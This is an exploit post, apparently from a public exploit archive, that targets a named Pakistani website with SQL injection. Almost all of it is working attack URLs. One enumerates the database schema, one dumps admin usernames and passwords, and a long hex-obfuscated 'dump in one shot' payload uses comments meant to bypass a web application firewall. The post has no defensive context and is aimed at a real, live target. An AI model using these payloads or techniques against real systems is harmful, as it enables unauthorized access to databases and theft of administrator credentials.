|\        /|  |  --------  |\        /| -------/  |---------/
| \      / |  |     |      | \      / |       /   |        /
|  \    /  |  |     |      |  \    /  |      /    |       /
|   \  /   |  |     |      |   \  /   |     /     |      /
|    \/    |  |     |      |    \/    |    /      |     /
|          |  |     |      |          |   /       |----/
|          |  |     |      |          |  /-----   |    \
|          |  |     |      |          |       /   |     \
|          |  |     |      |          |      /    |      \
|          |  |     |      |          |     /     |       \
|          |  |     |      |          |    /      |        \
|          |  |     |      |          |   /       |         \
|          |  |     |      |          |  /        |          \ @mitm3r
 
-----------------------------------------------------------------------------------------------
Site: 
-----------------------------------------------------------------------------------------------
######################
# Exploit Title : AEO.com SQL Injection
# Exploit Author : mitm3r
# Contact: [email protected]
# Vendor Homepage : http://aeo.com.pk
# Tested On : Windows7 / Kali linux / Mozilla firefox
######################
# Target: http://aeo.com.pk/site/contents.php?content_id=-32'

# Data
http://aeo.com.pk/site/contents.php?content_id=-32' UNION SELECT 1,2,3,group_concat('<br>',table_name,0x3a,column_name),5,6,7,8 from information_schema.columns where table_schema=database()--+

#Credentials
http://aeo.com.pk/site/contents.php
?content_id=-32' UNION SELECT 1,2,3,group_concat('<br>',user_id,0x3a,username,0x3a,password,0x3a,encrypt_paswrd,0x3a,admin_type),5,6,7,8 from admin_users--+

# DIOS (Dump in one shot) query
http://aeo.com.pk/site/contents.php?content_id=-32' UNION SELECT 1,2,3,concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:[email protected]%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:[email protected]_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/,5,6,7,8 from information_schema.columns where table_schema=database()--+


# siph0n [2018-05-17]